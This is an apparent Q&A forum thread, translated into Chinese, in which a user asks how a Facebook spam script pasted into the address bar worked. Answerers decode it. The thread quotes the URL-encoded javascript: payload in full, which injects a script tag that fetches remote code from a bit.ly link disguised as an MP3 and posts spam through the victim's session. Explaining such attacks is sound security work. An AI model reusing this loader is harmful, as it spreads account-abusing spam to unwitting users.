2011-06-05 156 views
2

所以,我刚刚在Facebook上看到了这个使用JavaScript编写的垃圾邮件代码,我想知道是否有人能向我解释代码如何工作,并与Facebook进行交互。我不打算将其用于恶意目的,但我只是对Facebook等网站的安全感兴趣。这里是从地址栏执行的代码(我建议不要自己尝试,最终可能会有一些烦人的朋友)。Facebook垃圾代码的说明

javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0) 
+0

它将脚本标记注入到从其他Web站点获取的源代码中。 – 2011-06-05 21:01:20

回答

3

检查在这里,链接URL编码:

http://meyerweb.com/eric/tools/dencoder/

的javascript:

a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0) 

从我所看到的:加载这个URL作为脚本,并将其添加到当前页面。

编辑: 加载被放置在该网址上的脚本:http://www.raxarstudios.com/x/audiotrack2.mp3

它伪装成一个MP3歌曲,但它只是JavaScript的:http://pastebin.com/RVmNVtt9 我迅速扫了一眼,它显然使用了一些重阿贾克斯添加事件,并加入你的十二个。

+1

有趣的是,如果你在bitly链接中添加一个“+”,你会得到一个统计页面,显示有多少人加载链接(4,000),发起者的bit.ly用户名('draze')去(一个MP3音轨) – 2011-06-05 21:02:41

+0

啊,从你们两个非常有用的提示,谢谢!我假设脚本被编码为MP3文件,这个假设是否正确?我还注意到,92%的流量来自Facebook,这与垃圾邮件脚本相匹配。 – James 2011-06-05 21:06:43

+0

该链接包含一个可以在文本编辑器中打开以查看代码的“mp3”。看起来不像它有任何幻想,只是向Facebook发出一些POST请求(只有当你进入该链接时你在Facebook上才能工作)。与Facebook的安全没有任何关系,因为他们可以做的事情并不多,他们可以通过手动方式运行恶意JavaScript ... – 2011-06-05 21:07:17